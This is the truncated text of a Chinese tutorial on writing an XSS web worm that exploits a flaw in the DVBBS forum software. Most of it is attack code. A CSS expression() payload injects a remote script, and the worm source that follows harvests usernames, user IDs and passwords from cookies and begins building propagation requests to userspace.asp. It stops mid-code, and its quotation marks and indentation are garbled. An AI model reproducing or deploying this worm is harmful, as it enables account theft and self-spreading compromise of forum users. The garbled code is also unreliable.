[课]由动网xss漏洞浅谈web蠕虫编写.docVIP

由动网xss漏洞浅谈web蠕虫编写 By 幻泉 今天我们跳出php漏洞的讲解做了这节课，为了给各位初学会员一个对xss基本的认识。 本次课程简单的说只是个砖头，为了吸引各位的玉玉。。。 希望大家不吝赐教。 本次课程讲解的内容有： 什么是xss蠕虫 一个xss蠕虫都有什么基本功能 如何编写一个xss蠕虫 Xss蠕虫的延伸发展 什么是xss蠕虫 大家在接触黑客的时候想必也和我一样了解一些蠕虫病毒，比如前几年比较猖獗的熊猫烧 香，还有最近Conficker蠕虫/woshihuanquan/blog/category/Xss） body {xss:expression(function a(){var x = document.createElement(SCRIPT);x.src=http://localhost:81/js.js;x.defer = true;document.getElementsByTagName(HEAD)[0].appendChild(x)}function inject(){window.setTimeout(a(),1000)}if(window.x!=1){window.x=1;inject()});} Code: //作者：幻泉[B.S.N] //由于第一次写蠕虫所以代码很不规范 //有很多bug正在修改中。。。。 //传播过程没写完。 //alert(document.cookie); // JavaScript Document var http = http://localhost:81;//定义当前论坛URL var worm =body {xss:expression(function a(){var x = document.createElement(SCRIPT);x.src=http://localhost:81/js.js;x.defer = true;document.getElementsByTagName(HEAD)[0].appendChild(x)}function inject(){window.setTimeout(a(),1000)}if(window.x!=1){window.x=1;inject()});}; //主函数 function mainhack(){ ???????? ????????//获取用户名 ????????var username=username; ????????username = getcookie(username,); ???????? ????????//判断用户是不是已经访问了 //????????if(document.cookie.indexOf(huan)==-1){ ????????????????//判断是不是本站用户 ????????????????if(username!=){ ????????????????????????//获取用户id ????????????????????????????????var userid=userid; ????????????????????????????????userid = getcookie(userid,); ????????????????????????????????//获取用户密码 ????????????????????????????????var password=password; ????????????????????????????????password = getcookie(password,); ????????????????????????????????//alert(hi, + username + , + userid + , + password);//弹出用户名密码还有id ????????????????????????????????//提交css地址 ????????????????????????????????var css = /userspace.asp?sid= + userid; ????????????????????????????????var css1 = http + /userspace.asp?act=sa